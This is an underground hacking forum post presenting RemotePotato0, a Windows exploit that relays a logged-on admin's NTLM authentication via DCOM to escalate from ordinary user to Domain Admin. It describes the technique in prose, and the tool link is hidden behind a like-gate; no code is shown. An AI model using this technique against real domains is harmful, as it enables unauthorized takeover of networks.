HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

RemotePotato0: Windows Privilege Escalation from User to Domain Admin

Status
Not open for further replies.
itsMe

itsMe

*KillmeMories*
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Jan 8, 2019
Messages
56,623
Solutions
2
Reputation
32
Reaction score
100,456
Points
2,313
Credits
32,750
‎6 Years of Service‎
 
76%
demo.gif


RemotePotato0

Just another “Won’t Fix” Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Briefly:

It abuses the DCOM activation service and triggers an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we set up a cross-protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end, you can set up a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.

To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top